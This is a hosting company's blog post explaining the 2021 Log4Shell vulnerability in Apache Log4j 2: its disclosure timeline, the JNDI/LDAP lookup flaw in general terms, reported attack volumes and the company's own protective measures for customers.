What Is Log4Shell and How Does It Affect ScalaHosting?
On November 24, security experts from Alibaba Cloud discovered a vulnerability in a popular Java logging framework called Log4j 2. They got in touch with The Apache Software Foundation, the organization responsible for developing Log4j, disclosed the bug, and helped with the release of a patch.
The update was rolled out on December 6, and three days later, the whole thing was reported publicly. The vulnerability earned a nickname, Log4Shell, and even today, more than two weeks later, it continues to be a central topic for many tech-oriented news outlets.
But what’s all the fuss about?
What Is Log4Shell?
Log4Shell, also known as CVE-2021-44228, is a zero-day vulnerability. A security bug is classified as a zero-day when the creator of the affected software is unaware of the problem and is unable to produce a patch for a long time.
In this particular instance, the vulnerable code was added to Log4j way back in 2013. Theoretically, hackers had eight years during which they could have exploited the security hole without anyone having the ability to stop them.
The bug lies with the way Log4j uses the Java Naming and Directory Interface (JNDI) API and the Lightweight Directory Access Protocol (LDAP) to allow lookups of Java objects.
While Log4j is logging a string, JNDI can be tricked into using LDAP to load an object from a remote location. Thanks to the lack of code sanitation measures, a resourceful hacker can run just about anything they want on the target machine.
It must be said that vulnerabilities are discovered in all sorts of software products every day. Usually, they are quickly patched and rarely prompt a particularly noteworthy response. However, with Log4Shell, things might be a little bit different.
How Bad Is It?
We all know that sometimes, in an attempt to draw as many clicks as they can, the media tend to blow a problem completely out of proportion, especially when we’re talking about niche fields like cybersecurity. Well, with Log4Shell, this is not the case.
It’s been described as “the most critical vulnerability in a decade,” and experts from Check Point reckon that it could mark the start of a “cyber pandemic” with potentially “incalculable” damages. They certainly have the figures to back those claims.
Check Point started monitoring the activity surrounding Log4Shell as soon as the bug was disclosed. Within 24 hours, they’d seen more than 60 different variations of the original exploit. In just three days, their sensors registered more than 800 thousand attempted attacks.
They say they have managed to mitigate around 4.3 million exploitation attempts and emphasize the danger posed to business organizations. According to their report, they have already seen attempted exploits against very nearly half of all corporate networks in the world.
In other words, yes, Log4Shell is a very serious problem. But what makes it so bad?
There are three main factors contributing to Log4Shell’s popularity with hackers:
It allows arbitrary remote code execution
The fact that cybercriminals can load and execute a remote script or file via Log4Shell means that the variety of payloads they can drop on the attacked machine is pretty much limitless. They have already demonstrated this.
Some attackers are trying to deploy cryptocurrency miners on the targeted machines. Others use the vulnerability to recruit more devices into their botnets, others still employ it to send spam, etc.
It’s easy to exploit
Part of the reason for the enormous volume of Log4Shell-related malicious activity is the readily available exploits and the fact that pretty much anyone can mount an attack. Because it’s so easy to take advantage of the vulnerability, the vast majority of Log4Shell activity comes from people who aren’t sophisticated enough to do any real damage.
That being said, experienced cybercriminals also use Log4Shell, and they’ve already caused some pretty high-profile incidents. On December 20, for example, the Belgian Defense Ministry admitted that hackers had used Log4Shell to bring some of its networks down.
Log4j is pretty much everywhere
Log4j was developed way back in 2001 to solve the lack of logging capabilities in the original Java Development Kit. Over the years, we’ve seen the appearance of frameworks serving the same purpose, but it would appear Log4j has remained one of the most popular choices.
It’s now a part of thousands of software packages, and it’s pretty much everywhere. Even if you haven’t installed it yourself, it may have been set up by one of the applications you’re using in your everyday life. As a result, properly patching the vulnerability is dependent on many parties and may not be particularly easy. This is a problem because hackers have access to scanners that can determine whether you’re vulnerable in seconds.
Vendors are scrambling to roll out updates, mitigate the dozens of available attack vectors, and let users know they need to update. However, with so many different applications deployed on such a large number of devices, we’re unlikely to see the problem go away for good any time soon.
ScalaHosting and Log4Shell
As a hosting provider, we can’t afford to ignore a threat like Log4Shell. The vulnerability is easily exploitable, and the affected framework is widely available. Because of this, we, alongside our data center partners, monitor our networks closely for any sign of suspicious activity.
We work hard on making software updates as easy as possible for our customers, and we always apply the latest security patches to everything that runs on our servers.
SShield, our proprietary AI-powered security system, will alert you immediately if something’s not right. You can also be sure that our technical support experts will point you in the right direction if you can’t figure out what’s going on.
Mind you, if you use one of our managed SPanel VPS solutions, Log4Shell is not really a problem at all. The purpose of a managed VPS is to give you the right hosting environment out of the box, meaning we are the ones setting up your virtual machines and installing all the software required to host your project.
This software doesn’t include Log4j.
Conclusion
Log4Shell is not to be underestimated. The affected software is found in many devices worldwide, the hackers clearly won’t shy away from using the dozens of available exploits, and the patches aren’t applied quickly enough.
Quite a few tools can help you determine whether your devices are vulnerable to an attack, but regardless of what they tell you, you have to always keep your software applications up-to-date. This will protect you not only against Log4Shell but also against hundreds of other threats.
As for your ScalaHosting account, you can leave it to us.